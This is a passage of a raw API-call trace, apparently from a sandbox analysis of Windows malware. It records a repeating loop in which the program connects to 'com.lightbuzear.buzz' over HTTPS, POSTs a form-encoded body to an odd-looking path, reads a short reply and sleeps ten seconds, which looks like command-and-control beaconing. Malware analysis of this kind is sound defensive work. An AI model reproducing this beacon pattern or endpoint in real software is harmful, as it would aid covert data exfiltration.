lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0228.752] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0228.752] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0228.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830368 | out: hHeap=0x4780000) returned 1 [0228.752] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0228.752] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0228.753] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0228.753] FreeLibrary (hLibModule=0x71570000) returned 1 [0228.753] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0228.753] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0228.753] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0228.753] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300c0 | out: hHeap=0x4780000) returned 1 [0228.754] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830278 | out: hHeap=0x4780000) returned 1 [0228.754] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0228.754] Sleep (dwMilliseconds=0x2710) [0228.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0228.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0228.763] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0228.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0228.763] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155d8 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48156e0 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815590 [0228.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0228.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0228.765] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0228.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0228.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0228.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0228.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157d0 [0228.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157e8 [0228.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0228.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0228.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0228.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830430 [0228.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0228.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0228.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830430 | out: hHeap=0x4780000) returned 1 [0228.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303b8 [0228.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0228.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0228.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0228.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0228.767] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0228.767] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0228.767] FreeLibrary (hLibModule=0x71780000) returned 1 [0228.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0228.767] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0228.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300c0 [0228.767] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0228.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0228.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0228.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0228.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0228.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0228.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0228.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815698 [0228.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0228.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0228.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815698 | out: hHeap=0x4780000) returned 1 [0228.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0228.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0228.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815500 [0228.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830368 [0228.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830368 | out: hHeap=0x4780000) returned 1 [0228.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0228.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830200 [0228.769] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482ffa8 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0228.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815698 [0228.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0228.771] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157a0 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815728 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157a0 | out: hHeap=0x4780000) returned 1 [0228.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0228.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815728 | out: hHeap=0x4780000) returned 1 [0228.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830250 [0228.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0228.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0228.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0228.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830278 [0228.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0228.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830318 [0228.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0228.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0228.773] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0228.773] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0228.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0228.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0228.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0228.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0228.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156f8 [0228.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815620 [0228.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156f8 | out: hHeap=0x4780000) returned 1 [0228.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0228.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815620 | out: hHeap=0x4780000) returned 1 [0228.775] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830250 [0228.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0228.775] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0228.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0228.775] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482ffd0 [0228.775] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0228.775] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830250 [0228.776] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0228.776] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0228.831] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0228.832] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0229.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0229.980] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0229.980] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0229.980] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0229.980] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0229.981] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0229.981] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0229.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815560 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815740 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815740 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48300e8 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0229.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830430 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0229.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0229.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0229.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0229.988] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0229.988] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0229.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0229.989] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815770 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815770 | out: hHeap=0x4780000) returned 1 [0229.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0229.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0229.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830110 [0229.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0229.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0229.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0229.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830458 [0229.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0229.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0229.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0229.991] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0229.991] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0229.991] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0229.991] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0229.991] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0229.992] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0229.992] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0229.992] FreeLibrary (hLibModule=0x71570000) returned 1 [0229.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0229.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0229.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ffa8 | out: hHeap=0x4780000) returned 1 [0229.993] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830200 | out: hHeap=0x4780000) returned 1 [0229.993] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300c0 | out: hHeap=0x4780000) returned 1 [0229.993] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0229.993] Sleep (dwMilliseconds=0x2710) [0230.012] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0230.012] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0230.012] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0230.012] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0230.012] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0230.012] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0230.012] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0230.012] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0230.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0230.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156e0 [0230.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0230.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155f0 [0230.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 